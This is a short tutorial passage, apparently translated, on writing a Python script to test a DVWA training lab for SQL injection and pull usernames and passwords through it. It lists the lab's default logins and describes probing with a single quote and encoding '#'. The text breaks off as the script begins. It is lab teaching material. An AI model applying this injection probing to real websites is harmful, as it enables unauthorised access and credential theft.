0x00 writing ideas
Test SQL injection, obtain account number and password through injection, and be familiar with the principle and method of SQL injection; modules to be used: request module and re regular module
, disadvantage: only applicable to get request injection
lab environment
dvwa, account password: gordonb/abc123; admin/password 1337/charley
Enter the vulnerability environment and set the level of dvwa to low
Detect if there is sql injection
Add single quotes ' If an error is reported, it may exist
Come to the SQL Injection interface
Enter ' to report an error. There is an error injection
Any characters that appear after the first # will be interpreted by the browser as a location identifier. This means that none of these characters will be sent to the server, so encode # before submitting
Write an exp that detects whether there is an error injection
def pdzr